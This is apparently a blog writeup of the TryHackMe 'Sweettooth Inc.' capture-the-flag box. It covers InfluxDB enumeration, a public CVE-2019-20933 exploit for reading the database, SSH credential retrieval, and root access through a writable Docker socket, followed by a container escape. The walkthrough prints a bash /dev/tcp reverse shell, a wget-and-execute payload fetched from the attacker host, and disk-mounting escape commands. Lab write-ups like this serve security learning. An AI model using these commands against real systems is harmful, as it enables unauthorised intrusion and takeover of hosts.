Email

TryHackMe Sweettooth Inc. Writeup

This writeup will help you solve the Sweettooth Inc. box on TryHackMe. Before we start enumerating the box, add the following line to your /etc/hosts file.

echo "<box_ip>   sweettooth.thm" >> /etc/hosts

TryHackMe Sweettooth Inc.– Enumeration

As per usual, we start by running a port scan on the host using nmap. The sC and
sV flags indicate that basic vulnerability scripts are executed against the target and that the port
scan tries to find version information.

nmap -sV -sC sweettooth.thm

You can read the output below:

PORT     STATE SERVICE REASON  VERSION
111/tcp  open  rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36179/tcp6  status
|   100024  1          42728/tcp   status
|   100024  1          49696/udp   status
|_  100024  1          58848/udp6  status
2222/tcp open  ssh     syn-ack OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey: 
|   1024 b0:ce:c9:21:65:89:94:52:76:48:ce:d8:c8:fc:d4:ec (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBALOlP9Bx9VQxs4JDY8vovlJp+l+pPX2MGttzN2gGNYABXAVSF9CA14OituA5tcJd5/Nv3Ru3Xyu8Yo5SV0d82rd7L/NF5Relx+iiVF+bigo329wbV3wsIrRQGUYHXiMjAs8WqQR+XKjOm3q4QLVxe/jU1I1ddy6/xO4fL7nOSh3RAAAAFQDKuQDe9pQtmnqvJkZ7QuCGm31+vQAAAIBENh/MS3oHvz1tCC4nZYwdAYZMBj2It0gYCMvD0oSkqL9IMaP9DIt/5G3D9ARrZPeSP4CqhfryIGHS7t59RNdnc3ukEsfJPo23bPBwWdIW7HXp9XDqyY1kD6L3Tq0bpeXpeXt6FQ93rFxncZngFkCrMD4+YytS532qPHMPOWh75gAAAIA7TohVech8kWTh6KIMl2Y61s9cwUqwrTkqJIYMdZ73nP69FD0bw08vyrdAwtVnsqRaNzsVVz9sBOOz3wmp/ZNI5NiuyA0UwEcxPj5k6jCn620gBpMEzVy6a8Ih3yRYHoiVMrQ/PIuoeIGxeYGckCorv8jSz2O3pq1Fnz23FRPH2A==
|   2048 7e:86:88:fe:42:4e:94:48:0a:aa:da:ab:34:61:3c:6e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCbBmLBPg9mxkAdEbJGnz0v6Jzo4qdBcajkaIBKewKyz6OQTvyhVcDReSB2Dz0nl4mPCs3UN58hSNStCYXjZcpIBpqz2pHupVlqQ7u41Vo2W8u0nVFLt2U8JhTtA9wE6MA9GhitkN3Qorhxb3klCpSnWCDdcmkdNL0EYxZV53A52VWiNGX3vYkdMAKHAmp/VHvrsIeHozqflL8vD2UIoDmxDJwgXJRsr2iGVU1fL/Bu/DwlPwJkm50ua99yPpZbvCS9EwWki76aEtZSbcM4WHzx33Oe3tLXLCfKc9CJdIW35nBvpe5Dxl7gLR/mCHp2iTpdx1FmpSf+JjO/m2vKwL4X
|   256 04:1c:82:f6:a6:74:53:c9:c4:6f:25:37:4c:bf:8b:a8 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHufHfqIZHVEKYC/yyNS+vTt35iULiIWoFNSQP/Bm/v90QzZjsYU9MSt7xdlR/2LZp9VWk32nl5JL65tvCMImxc=
|   256 49:4b:dc:e6:04:07:b6:d5:ab:c0:b0:a3:42:8e:87:b5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJEYHtE8GbpGSlNB+/3IWfYRFrkJB+N9SmKs3Uh14pPj
8086/tcp open  http    syn-ack InfluxDB http admin 1.3.0
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There are 3 open ports. Port 111 serves RPCbind and port 2222 serves SSH. The most interesting port number is 8086, which serves a Database application called InfluxDB. Let’s try to enumerate this service first.

InfluxDB enumeration

The first task here is to find a valid username. Using the following link, I was able to find the username by browsing to: http://sweettooth.thm:8086/debug/requests. You should see the following JSON encoded response:

{
"REDACTED:127.0.0.1": {"writes":2,"queries":2}
}

Now that we obtained the username, we should try to access data from the database. When searching for an InfluxDB vulnerability, I stumbled upon the following exploit. The exploit provides a tool to access the data from an InfluxDB database when a username is known. Run the following commands to install the exploit tool:

git clone https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933.git
cd InfluxDB-Exploit-CVE-2019-20933
python3 -m pip install -r requirements.txt

Now run python3 __main__.py to use the application. You should provide the IP address, the port number of the box machine and the just-found username. If you provide everything correctly, you should see the following output:

Databases list:

1) creds
2) docker
3) tanks
4) mixer
5) _internal

You can run use DATABASE_NAME to select a database. Furthermore, use the command show measurements to show the tables of a database. In order to find the temperature of the water tank at 1621346400 (UTC Unix Timestamp), we need to acquire all information from the tanks database. Run the following commands to acquire that data:

tanks
show measurements
select * from water_tank;

This shows us the water tank level for a lot of timestamps. Using: Epoch Converter we can find the time is the 18th of May at 14:00. Now check the database to find the following entry:

    "2021-05-18T14:00:00Z",
                            93.47,
                            REDACTED
                        ],

After finding the temperature of the water, we should continue finding the highest rpm the mixer reached. To do so, run the following commands:

exit
mixer
show measurements
select * from mixer_stats
select max(motor_rpm) from mixer_stats

You can see the output below:

"values": [
                        [
                            "2021-05-20T15:00:00Z",
                            REDACTED
                        ]
                    ]

TryHackMe Sweettooth Inc. – User Flag

Now on to the real work, let’s find a username within this database. There was a creds database. Let’s check its contents. Run the following command to view some credentials:

exit
creds
show measurements
select * from ssh

You can find the output below:

{
    "results": [
        {
            "series": [
                {
                    "columns": [
                        "time",
                        "pw",
                        "user"
                    ],
                    "name": "ssh",
                    "values": [
                        [
                            "2021-05-16T12:00:00Z",
                            REDACTED_PASSWORD,
                            "REDACTED_USERNAME"
                        ]
                    ]
                }
            ],
            "statement_id": 0
        }
    ]
}

Now you can log into the server using SSH. To do so, run:

ssh -p 2222 [email protected]

You can find the user.txt flag in the /home/REDACTED_USER directory.

TryHackMe Sweettooth Inc. – Root Flag

Now that we have found the user.txt flag, let’s find the root.txt flag. When running linpeas.sh. I found the interesting file: /var/run/docker.sock which was writeable by the current user. Furthermore, when checking all the running processes with ps aux we can find that the docker container is running on port 8080. You can see a small snippet of ps aux below:

socat TCP-LISTEN:8080,reuseaddr,fork UNIX-CLIENT:/var/run/docker.sock

Now we can use SSH to forward the 8080 to our attacking machine, so we can inspect the running docker container. You can do so by running the following command on your attacking machine:

ssh -p 2222 [email protected] -L 8080:localhost:8080

Provide the password of the uzJk6Ry98d8C user. Now we can browse to http://localhost:8080/containers/json to find the container name: sweettoothinc. We can use this container name to execute commands within the docker container. Craft a reverse shell file on your attacking machine containing the following content:

bash -i >& /dev/tcp/ATTACKING_IP/9001>&1

Save this file as, for example, obz.sh. On your attacking machine, run python3 -m http.server to start a web server. In order to catch your reverse shell, run the following command in a new terminal on your attacking machine:

nc -lvnp 9001

You can download and run this file to the machine by running the following snippet:

docker -H localhost:8080 container exec sweettoothinc wget http://10.9.5.154:8000/shell.sh
docker -H localhost:8080 container exec sweettoothinc chmod +x shell.sh
docker -H localhost:8080 container exec sweettoothinc bash -i shell.sh

Go back to your listening netcat terminal and run:

passwd 
obz
obz

After logging in as the uzJk6Ry98d8C user, you should now be able to change to the root user by running:

su root

Provide the obz password, and you should now be the root user within the docker container. You can find the root.txt flag at /root/root.txt

Escape!

The last part of completing this box consists of escaping the docker container. You can run the following command to find possible hard drives to mount:

fdisk -l

You can see the output below:

/dev/xvda1 *        2048 32088063 32086016 15.3G 83 Linux
/dev/xvda2      32090110 33552383  1462274  714M  5 Extended
/dev/xvda5      32090112 33552383  1462272  714M 82 Linux swap / Solaris

Usually, this should not be visible within a docker container. A docker container should not have knowledge of data outside the container. Knowing this, we can try to mount the hard drive within the docker container. Run the following code to mount /dev/xvda1 within the Linux docker:

mkdir /mnt/linux
mount /dev/xvda1 /mnt/linux

Success! You can find the final root.txt flag which is now located at: /mnt/linux/root/root.txt.

This box was interesting to root. You should update all your software to the latest version to prevent possible exploits. Furthermore, if you decide to use docker containers, make sure your docker container is secure. Most default configurations should be more secure than the ones found in this box.

About

Twitter | Facebook

Leave a Reply

Your email address will not be published. Required fields are marked *

Social Media

Categories

Popular Posts

  • TryHackMe Team
    Hacking, TryHackMe, Writeups

    TryHackMe Team Writeup

    TryHackMe Glitch
    Hacking, TryHackMe, Writeups

    TryHackMe GLITCH Writeup

    TryHackMe VulnNet
    Hacking, TryHackMe, Writeups

    TryHackMe VulnNet Writeup

    TryHackMe Couch
    Hacking, TryHackMe, Writeups

    TryHackMe Couch Writeup

    tModLoader
    Gaming, Modding

    Modding Terraria – Part 3 Adding a custom pet

    • Instagram